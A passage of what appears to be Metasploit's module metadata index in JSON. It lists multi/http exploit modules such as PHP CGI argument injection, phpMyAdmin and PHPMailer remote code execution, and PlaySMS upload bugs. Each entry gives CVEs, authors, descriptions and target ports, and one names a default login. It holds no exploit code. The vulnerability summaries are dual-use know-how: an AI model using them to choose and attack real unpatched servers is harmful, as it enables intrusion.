"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/phoenix_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/phoenix_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/php_cgi_arg_injection": {
"name": "PHP CGI Argument Injection",
"full_name": "exploit/multi/http/php_cgi_arg_injection",
"rank": 600,
"disclosure_date": "2012-05-03",
"type": "exploit",
"author": [
"egypt <egypt@metasploit.com>",
"hdm <x@hdm.io>",
"jjarmoc",
"kingcope",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to\n an argument injection vulnerability. This module takes advantage of\n the -d flag to set php.ini directives to achieve code execution.\n From the advisory: \"if there is NO unescaped '=' in the query string,\n the string is split on '+' (encoded space) characters, urldecoded,\n passed to a function that escapes shell metacharacters (the \"encoded in\n a system-defined manner\" from the RFC) and then passes them to the CGI\n binary.\" This module can also be used to exploit the plesk 0day disclosed\n by kingcope and exploited in the wild on June 2013.",
"references": [
"CVE-2012-1823",
"OSVDB-81633",
"OSVDB-93979",
"EDB-25986",
"URL-http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/",
"URL-http://kb.parallels.com/en/116241"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/php_cgi_arg_injection.rb",
"is_install_path": true,
"ref_name": "multi/http/php_cgi_arg_injection",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/php_utility_belt_rce": {
"name": "PHP Utility Belt Remote Code Execution",
"full_name": "exploit/multi/http/php_utility_belt_rce",
"rank": 600,
"disclosure_date": "2015-12-08",
"type": "exploit",
"author": [
"WICS",
"Jay Turla"
],
"description": "This module exploits a remote code execution vulnerability in PHP Utility Belt,\n which is a set of tools for PHP developers and should not be installed in a\n production environment, since this application runs arbitrary PHP code as an\n intended functionality.",
"references": [
"EDB-38901",
"URL-https://github.com/mboynes/php-utility-belt"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"PHP Utility Belt"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/php_utility_belt_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/php_utility_belt_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/php_volunteer_upload_exec": {
"name": "PHP Volunteer Management System v1.0.2 Arbitrary File Upload Vulnerability",
"full_name": "exploit/multi/http/php_volunteer_upload_exec",
"rank": 600,
"disclosure_date": "2012-05-28",
"type": "exploit",
"author": [
"Ashoo <ashoo.online@gmail.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in PHP Volunteer Management System,\n version v1.0.2 or prior. This application has an upload feature that allows an\n authenticated user to upload anything to the 'uploads' directory, which is actually\n reachable by anyone without a credential. An attacker can easily abuse this upload\n functionality first by logging in with the default credential (admin:volunteer),\n upload a malicious payload, and then execute it by sending another GET request.",
"references": [
"OSVDB-82391",
"EDB-18941"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"PHP Volunteer Management 1.0.2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/php_volunteer_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/php_volunteer_upload_exec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/phpfilemanager_rce": {
"name": "phpFileManager 0.9.8 Remote Code Execution",
"full_name": "exploit/multi/http/phpfilemanager_rce",
"rank": 600,
"disclosure_date": "2015-08-28",
"type": "exploit",
"author": [
"hyp3rlinx",
"Jay Turla"
],
"description": "This module exploits a remote code execution vulnerability in phpFileManager\n 0.9.8, a single-file filesystem management tool.",
"references": [
"CVE-2015-5958",
"EDB-37709",
"URL-http://phpfm.sourceforge.net/"
],
"platform": "Unix,Windows",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"phpFileManager / Unix",
"phpFileManager / Windows"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/multi/http/phpfilemanager_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/phpfilemanager_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/phpldapadmin_query_engine": {
"name": "phpLDAPadmin query_engine Remote PHP Code Injection",
"full_name": "exploit/multi/http/phpldapadmin_query_engine",
"rank": 600,
"disclosure_date": "2011-10-24",
"type": "exploit",
"author": [
"EgiX <n0b0d13s@gmail.com>",
"mr_me <steventhomasseeley@gmail.com>",
"TecR0c <roccogiovannicalvi@gmail.com >"
],
"description": "This module exploits a vulnerability in lib/functions.php of\n phpLDAPadmin versions 1.2.1.1 and earlier that allows attacker-supplied input\n to be passed directly to the create_function() PHP function. A patch was\n issued that uses a whitelist regular expression to check the user-supplied\n input before it is passed to the create_function() call.",
"references": [
"CVE-2011-4075",
"OSVDB-76594",
"BID-50331",
"EDB-18021"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/phpldapadmin_query_engine.rb",
"is_install_path": true,
"ref_name": "multi/http/phpldapadmin_query_engine",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/phpmailer_arg_injection": {
"name": "PHPMailer Sendmail Argument Injection",
"full_name": "exploit/multi/http/phpmailer_arg_injection",
"rank": 0,
"disclosure_date": "2016-12-26",
"type": "exploit",
"author": [
"Dawid Golunski",
"Spencer McIntyre"
],
"description": "PHPMailer versions up to and including 5.2.19 are affected by a\n vulnerability which can be leveraged by an attacker to write a file with\n partially controlled contents to an arbitrary location through injection\n of arguments that are passed to the sendmail binary. This module\n writes a payload to the web root of the webserver before then executing\n it with an HTTP request. The user running PHPMailer must have write\n access to the specified WEB_ROOT directory and successful exploitation\n can take a few minutes.",
"references": [
"CVE-2016-10033",
"CVE-2016-10045",
"EDB-40968",
"EDB-40969",
"URL-https://github.com/opsxcq/exploit-CVE-2016-10033",
"URL-https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"PHPMailer <5.2.18",
"PHPMailer 5.2.18 - 5.2.19"
],
"mod_time": "2018-10-27 20:54:14 +0000",
"path": "/modules/exploits/multi/http/phpmailer_arg_injection.rb",
"is_install_path": true,
"ref_name": "multi/http/phpmailer_arg_injection",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
],
"Reliability": [
"repeatable-session"
]
}
},
"exploit_multi/http/phpmoadmin_exec": {
"name": "PHPMoAdmin 1.1.2 Remote Code Execution",
"full_name": "exploit/multi/http/phpmoadmin_exec",
"rank": 600,
"disclosure_date": "2015-03-03",
"type": "exploit",
"author": [
"Pichaya Morimoto pichaya <Pichaya Morimoto pichaya@ieee.org>",
"Ricardo Jorge Borges de Almeida <ricardojba1@gmail.com>"
],
"description": "This module exploits an arbitrary PHP command execution vulnerability due to a\n dangerous use of eval() in PHPMoAdmin.",
"references": [
"CVE-2015-2208",
"EDB-36251",
"URL-https://seclists.org/fulldisclosure/2015/Mar/19",
"URL-https://seclists.org/oss-sec/2015/q1/743"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"PHPMoAdmin"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/multi/http/phpmoadmin_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/phpmoadmin_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/phpmyadmin_3522_backdoor": {
"name": "phpMyAdmin 3.5.2.2 server_sync.php Backdoor",
"full_name": "exploit/multi/http/phpmyadmin_3522_backdoor",
"rank": 300,
"disclosure_date": "2012-09-25",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits an arbitrary code execution backdoor\n placed into phpMyAdmin v3.5.2.2 through a compromised SourceForge mirror.",
"references": [
"CVE-2012-5159",
"OSVDB-85739",
"EDB-21834",
"URL-http://www.phpmyadmin.net/home_page/security/PMASA-2012-5.php"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb",
"is_install_path": true,
"ref_name": "multi/http/phpmyadmin_3522_backdoor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/phpmyadmin_lfi_rce": {
"name": "phpMyAdmin Authenticated Remote Code Execution",
"full_name": "exploit/multi/http/phpmyadmin_lfi_rce",
"rank": 400,
"disclosure_date": "2018-06-19",
"type": "exploit",
"author": [
"ChaMd5",
"Henry Huang",
"Jacob Robles"
],
"description": "phpMyAdmin v4.8.0 and v4.8.1 are vulnerable to local file inclusion,\n which can be exploited post-authentication to execute PHP code through the\n application. The module has been tested with phpMyAdmin v4.8.1.",
"references": [
"BID-104532",
"CVE-2018-12613",
"CWE-661",
"URL-https://www.phpmyadmin.net/security/PMASA-2018-4/",
"URL-https://www.secpulse.com/archives/72817.html",
"URL-https://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-Authorited-CLI-to-RCE/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Windows",
"Linux"
],
"mod_time": "2018-08-24 07:18:24 +0000",
"path": "/modules/exploits/multi/http/phpmyadmin_lfi_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/phpmyadmin_lfi_rce",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/phpmyadmin_null_termination_exec": {
"name": "phpMyAdmin Authenticated Remote Code Execution",
"full_name": "exploit/multi/http/phpmyadmin_null_termination_exec",
"rank": 600,
"disclosure_date": "2016-06-23",
"type": "exploit",
"author": [
"Michal Čihař and Cure53",
"Matteo Cantoni <goony@nothink.org>"
],
"description": "phpMyAdmin 4.0.x before 4.0.10.16, 4.4.x before 4.4.15.7, and 4.6.x before\n 4.6.3 does not properly choose delimiters to prevent use of the preg_replace\n (aka eval) modifier, which might allow remote attackers to execute arbitrary\n PHP code via a crafted string, as demonstrated by the table search-and-replace\n implementation.",
"references": [
"BID-91387",
"CVE-2016-5734",
"CWE-661",
"URL-https://www.phpmyadmin.net/security/PMASA-2016-27/",
"URL-https://security.gentoo.org/glsa/201701-32",
"EDB-40185"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-08-26 04:18:38 +0000",
"path": "/modules/exploits/multi/http/phpmyadmin_null_termination_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/phpmyadmin_null_termination_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/phpmyadmin_preg_replace": {
"name": "phpMyAdmin Authenticated Remote Code Execution via preg_replace()",
"full_name": "exploit/multi/http/phpmyadmin_preg_replace",
"rank": 600,
"disclosure_date": "2013-04-25",
"type": "exploit",
"author": [
"Janek \"waraxe\" Vind",
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module exploits a PREG_REPLACE_EVAL vulnerability in phpMyAdmin's\n replace_prefix_tbl within libraries/mult_submits.inc.php via db_settings.php.\n This affects versions 3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3.\n PHP versions > 5.4.6 are not vulnerable.",
"references": [
"CVE-2013-3238",
"PMASA-2013-2",
"waraxe-2013-SA#103",
"EDB-25003",
"OSVDB-92793",
"URL-http://www.waraxe.us/advisory-103.html",
"URL-http://www.phpmyadmin.net/home_page/security/PMASA-2013-2.php"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/phpmyadmin_preg_replace.rb",
"is_install_path": true,
"ref_name": "multi/http/phpmyadmin_preg_replace",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/phpscheduleit_start_date": {
"name": "phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Code Injection",
"full_name": "exploit/multi/http/phpscheduleit_start_date",
"rank": 600,
"disclosure_date": "2008-10-01",
"type": "exploit",
"author": [
"EgiX",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an arbitrary PHP code execution flaw in the phpScheduleIt\n software. This vulnerability is only exploitable when the magic_quotes_gpc PHP\n option is 'off'. Authentication is not required to exploit the bug.\n\n Version 1.2.10 and earlier of phpScheduleIt are affected.",
"references": [
"CVE-2008-6132",
"OSVDB-48797",
"BID-31520",
"EDB-6646"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/phpscheduleit_start_date.rb",
"is_install_path": true,
"ref_name": "multi/http/phpscheduleit_start_date",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/phptax_exec": {
"name": "PhpTax pfilez Parameter Exec Remote Code Injection",
"full_name": "exploit/multi/http/phptax_exec",
"rank": 600,
"disclosure_date": "2012-10-08",
"type": "exploit",
"author": [
"Jean Pascal Pereira <pereira@secbiz.de>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in PhpTax, an income tax report\n generator. When generating a PDF, the icondrawpng() function in drawimage.php\n does not properly handle the pfilez parameter, which will be used in an exec()\n statement, and then results in arbitrary remote code execution under the context\n of the web server. Please note: authentication is not required to exploit this\n vulnerability.",
"references": [
"OSVDB-86992",
"EDB-21665"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"PhpTax 0.8"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/multi/http/phptax_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/phptax_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/phpwiki_ploticus_exec": {
"name": "Phpwiki Ploticus Remote Code Execution",
"full_name": "exploit/multi/http/phpwiki_ploticus_exec",
"rank": 600,
"disclosure_date": "2014-09-11",
"type": "exploit",
"author": [
"Benjamin Harris",
"us3r777 <us3r777@n0b0.so>"
],
"description": "The Ploticus module in PhpWiki 1.5.0 allows remote attackers to execute arbitrary\n code via command injection.",
"references": [
"CVE-2014-5519",
"OSVDB-110576",
"EDB-34451",
"URL-https://sourceforge.net/p/phpwiki/code/8974/?page=1",
"URL-https://seclists.org/fulldisclosure/2014/Aug/77"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic (PHP Payload)",
"Linux x86"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/multi/http/phpwiki_ploticus_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/phpwiki_ploticus_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/pimcore_unserialize_rce": {
"name": "Pimcore Unserialize RCE",
"full_name": "exploit/multi/http/pimcore_unserialize_rce",
"rank": 300,
"disclosure_date": "2019-03-11",
"type": "exploit",
"author": [
"Daniele Scanu",
"Fabio Cogno"
],
"description": "This module exploits a PHP unserialize() in Pimcore before 5.7.1 to\n execute arbitrary code. An authenticated user with \"classes\" permission\n could exploit the vulnerability.\n\n The vulnerability exists in the \"ClassController.php\" class, where the\n \"bulk-commit\" method makes it possible to exploit the unserialize function\n when passing untrusted values in \"data\" parameter.\n\n Tested on Pimcore 5.4.0-5.4.4, 5.5.1-5.5.4, 5.6.0-5.6.6 with the Symfony\n unserialize payload.\n\n Tested on Pimcore 4.0.0-4.6.5 with the Zend unserialize payload.",
"references": [
"CVE-2019-10867",
"URL-https://github.com/pimcore/pimcore/commit/38a29e2f4f5f060a73974626952501cee05fda73",
"URL-https://snyk.io/vuln/SNYK-PHP-PIMCOREPIMCORE-173998"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Pimcore 5.x (Symfony unserialize payload)",
"Pimcore 4.x (Zend unserialize payload)"
],
"mod_time": "2019-04-29 08:43:33 +0000",
"path": "/modules/exploits/multi/http/pimcore_unserialize_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/pimcore_unserialize_rce",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/playsms_filename_exec": {
"name": "PlaySMS sendfromfile.php Authenticated \"Filename\" Field Code Execution",
"full_name": "exploit/multi/http/playsms_filename_exec",
"rank": 600,
"disclosure_date": "2017-05-21",
"type": "exploit",
"author": [
"Touhid M.Shaikh <touhidshaikh22@gmail.com>",
"DarkS3curity"
],
"description": "This module exploits a code injection vulnerability within an authenticated file\n upload feature in PlaySMS v1.4. This issue is caused by improper file name handling\n in sendfromfile.php file.\n Authenticated Users can upload a file and rename the file with a malicious payload.\n This module was tested against PlaySMS 1.4 on VulnHub's Dina 1.0 machine and Windows 7.",
"references": [
"EDB-42003",
"CVE-2017-9080",
"URL-https://www.youtube.com/watch?v=MuYoImvfpew",
"URL-http://touhidshaikh.com/blog/?p=336"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"PlaySMS 1.4"
],
"mod_time": "2018-05-07 07:26:28 +0000",
"path": "/modules/exploits/multi/http/playsms_filename_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/playsms_filename_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/playsms_uploadcsv_exec": {
"name": "PlaySMS import.php Authenticated CSV File Upload Code Execution",
"full_name": "exploit/multi/http/playsms_uploadcsv_exec",
"rank": 600,
"disclosure_date": "2017-05-21",
"type": "exploit",
"author": [
"Touhid M.Shaikh <touhidshaikh22@gmail.com>"
],
"description": "This module exploits an authenticated file upload remote code execution vulnerability\n in PlaySMS Version 1.4. This issue is caused by improper file contents handling in\n import.php (aka the Phonebook import feature). Authenticated Users can upload a CSV\n file containing a malicious payload via vectors involving the User-Agent HTTP header\n and PHP code in the User-Agent.\n This module was tested against PlaySMS 1.4 on VulnHub's Dina 1.0 machine and Windows 7.",
"references": [
"CVE-2017-9101",
"URL-https://www.youtube.com/watch?v=KIB9sKQdEwE",
"EDB-42044"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"PlaySMS 1.4"
],
"mod_time": "2018-05-07 09:22:21 +0000",
"path": "/modules/exploits/multi/http/playsms_uploadcsv_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/playsms_uploadcsv_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/plone_popen2": {
"name": "Plone and Zope XMLTools Remote Command Execution",
"full_name": "exploit/multi/http/plone_popen2",
"rank": 600,
"disclosure_date": "2011-10-04",
"type": "exploit",
"author": [
"Unknown",
"Nick Miles",
"TecR0c <roccogiovannicalvi@gmail.com>"
],
"description": "Unspecified vulnerability in Zope 2.12.x and 2.13.x, as used in Plone 4.0.x\n through 4.0.9, 4.1, and 4.2 through 4.2a2, allows remote attackers to execute\n arbitrary commands via vectors related to the p_ class in OFS/misc_.py and\n the use of Python modules.",
"references": [
"CVE-2011-3587",
"OSVDB-76105",
"EDB-18262",
"URL-http://plone.org/products/plone/security/advisories/20110928"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/plone_popen2.rb",
"is_install_path": true,
"ref_name": "multi/http/plone_popen2",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/pmwiki_pagelist": {
"name": "PmWiki pagelist.php Remote PHP Code Injection Exploit",
"full_name": "exploit/multi/http/pmwiki_pagelist",
"rank": 600,
"disclosure_date": "2011-11-09",
"type": "exploit",
"author": [
"EgiX",
"TecR0c <roccogiovannicalvi@gmail.com>"
],
"description": "This module exploits an arbitrary command execution vulnerability\n in PmWiki from 2.0.0 to 2.2.34. The vulnerable function is\n inside /scripts/pagelist.php.",
"references": [
"CVE-2011-4453",
"BID-50776",
"OSVDB-77261",
"EDB-18149",
"URL-http://www.pmwiki.org/wiki/PITS/01271"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/pmwiki_pagelist.rb",
"is_install_path": true,
"ref_name": "multi/http/pmwiki_pagelist",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/polarcms_upload_exec": {
"name": "PolarBear CMS PHP File Upload Vulnerability",
"full_name": "exploit/multi/http/polarcms_upload_exec",
"rank": 600,
"disclosure_date": "2012-01-21",
"type": "exploit",
"author": [
"Fady Mohamed Osman"
],
"description": "This module exploits a file upload vulnerability found in PolarBear CMS.\n By abusing the upload.php file, a malicious user can upload a file to a temp\n directory without authentication, which results in arbitrary code execution.",
"references": [
"CVE-2013-0803",
"OSVDB-90627"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic (PHP Payload)",
"Linux x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/polarcms_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/polarcms_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/processmaker_exec": {
"name": "ProcessMaker Open Source Authenticated PHP Code Execution",
"full_name": "exploit/multi/http/processmaker_exec",
"rank": 600,
"disclosure_date": "2013-10-24",
"type": "exploit",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a PHP code execution vulnerability in the\n 'neoclassic' skin for ProcessMaker Open Source which allows any\n authenticated user to execute PHP code. The vulnerable skin is\n installed by default in version 2.x and cannot be removed via\n the web interface.",
"references": [
"OSVDB-99199",
"BID-63411",
"URL-http://bugs.processmaker.com/view.php?id=13436"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"ProcessMaker Open Source 2.x (PHP Payload)"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/multi/http/processmaker_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/processmaker_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/processmaker_plugin_upload": {
"name": "ProcessMaker Plugin Upload",
"full_name": "exploit/multi/http/processmaker_plugin_upload",
"rank": 600,
"disclosure_date": "2010-08-25",
"type": "exploit",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module will generate and upload a plugin to ProcessMaker\n resulting in execution of PHP code as the web server user.\n\n Credentials for a valid user account with Administrator roles\n are required to run this module.\n\n This module has been tested successfully on ProcessMaker versions\n 1.6-4276, 2.0.23, 3.0 RC 1, 3.2.0, 3.2.1 on Windows 7 SP 1;\n and version 3.2.0 on Debian Linux 8.",
"references": [
"URL-http://wiki.processmaker.com/3.0/Plugin_Development"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/multi/http/processmaker_plugin_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/processmaker_plugin_upload",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/qdpm_upload_exec": {
"name": "qdPM v7 Arbitrary PHP File Upload Vulnerability",
"full_name": "exploit/multi/http/qdpm_upload_exec",
"rank": 600,
"disclosure_date": "2012-06-14",
"type": "exploit",
"author": [
"loneferret",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in qdPM - a web-based project management\n software. The user profile's photo upload feature can be abused to upload an\n arbitrary file onto the victim server machine, which allows remote code execution.\n Please note that in order to use this module, you must have valid credentials to sign\n in.",
"references": [
"OSVDB-82978",
"EDB-19154"
],
"platform": "Linux,PHP",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic (PHP Payload)",
"Linux x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/qdpm_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/qdpm_upload_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/rails_actionpack_inline_exec": {
"name": "Ruby on Rails ActionPack Inline ERB Code Execution",
"full_name": "exploit/multi/http/rails_actionpack_inline_exec",
"rank": 600,
"disclosure_date": "2016-03-01",
"type": "exploit",
"author": [
"RageLtMan <rageltman@sempervictus>"
],
"description": "This module exploits a remote code execution vulnerability in the\n inline request processor of the Ruby on Rails ActionPack component.\n This vulnerability allows an attacker to pass ERB to the inline\n JSON processor, which is then rendered, permitting full RCE within\n the runtime, without logging an error condition.",
"references": [
"CVE-2016-2098"
],
"platform": "Ruby",
"arch": "ruby",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/rails_actionpack_inline_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/rails_actionpack_inline_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/rails_dynamic_render_code_exec": {
"name": "Ruby on Rails Dynamic Render File Upload Remote Code Execution",
"full_name": "exploit/multi/http/rails_dynamic_render_code_exec",
"rank": 600,
"disclosure_date": "2016-10-16",
"type": "exploit",
"author": [
"mr_me <mr_me@offensive-security.com>",
"John Poulin (forced-request)"
],
